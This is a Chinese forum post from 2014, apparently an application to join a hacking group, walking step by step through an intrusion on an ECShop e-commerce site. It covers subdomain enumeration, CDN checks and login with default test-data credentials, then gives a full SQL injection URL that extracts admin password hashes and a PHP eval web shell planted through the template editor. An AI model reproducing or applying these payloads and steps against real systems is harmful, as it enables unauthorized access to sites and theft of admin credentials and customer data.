申请转正

buxuan

##########################################
#  Title    ：帮朋友 搞站（08sec申请转正帖）
#  Time   ： 2014年5月26日
#  Team  ：  
#  Author ： 蜗牛
#  首发   ： 08安全小组
#图片 在本地， 传不上去纠结
#######################################
目标站点：
www.xx.cn

KaLi
dnsrecon -d xx.cn -g --google --lifetime 30

结果：
www.xx.cn  =>  4.4.4.4
sp.xx.cn  => 3.3.3.11
down.xx.cn => 4.1.1.1
mail.xx.cn => 3.3.37.3
service.xx.cn =>3.3.4.2

看IP格式 ，sp.xx.cn mail.xx.cn  service.xx.cn 都是 3.3.3.* 像一个网段的。
主站 www.xx.cn 的IP 和 down.xx.cn 的IP没有规律。

顺手访问了一下 ：down.xx.cn


第一眼看，感觉有戏，可以列目录。上面好多rar的文件，打包下载下来发现 都是游戏资源，再结合二级目录的名字 这个很可能是游戏资源服务器，搞下来意义不大，一般游戏资源服务器都做了cdn。结果证明了猜测是正确的。
直接把 down.xx.cn 域名都放 http://ping.aizhan.com/ 上面,想通过各地ping域名看一下，看得到的结果是否同一个IP 来判断单个的域名是否用了CDN,结果正是我的猜测。





。。。。。。。。宁愿我猜错了。。。
把主站和二级域名都放上去。各地ping一下 ，最终得到结果。

www.xx.com
down.xx.com
2个域名使用了 CDN

mail.xx.cn
service.xx.cn
sp.xx.cn
这3个没使用CDN

分别访问 这3个域名：
mail.xx.cn 无法访问，其实对于这个是没有患有任何希望的，  mail差不多就告诉我结果。
service.xx.cn  访问显示一片空白。
访问  sp.xx.cn 出来了


一看这个界面，我笑了。 默认账号密码登录失败。。
FUCK
看来管理员安全意识还是有的，即使是这样的开发测试版本都知道换后台的帐号密码。。 不过 既然 安装了ecshop的时候默认安装了测试数据，那么 哈哈！
默认安装ecshop测试数据的话，在后台会有2个帐号：
shhaigonghuo1   密码shhaigonghuo1  
帐号bjgonghuo1  密码shhaigonghuo1
果断尝试这其中一个，成功登录进去了。。。。
可是  后台权限太小了，不过我记得前段时间出过一个 很鸡肋的ecshop后台注入漏洞的。

直接：http://sp.xx.cn/admin/affiliate_ ... 28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23

果断出来密码了


md5居然是收费的，  不过能出来密码算是不错


帮买了直接 。直接admin 登录上去。

报错 不出路径，服务器上屏蔽了报错信息了，看来插入数据库走不通了，看菜单栏选项里面的库项目管理存在，顿时了起来了。。

模板管理==>库项目管理==>选择myship.lbi 配送方式。
在文件内容最后面加入一句话代码：<?php eval($_POST[1]);?>
菜刀链接http://www.xx.cn/myship.php 成功。


只能说运气了。

管理03

上个图吧

buxuan

发个邮箱  word文档直接发你邮箱吧 。这个好像不能穿本地的图片上来

buxuan

管理03 发表于 2014-5-26 21:30
上个图吧

图以上 。。。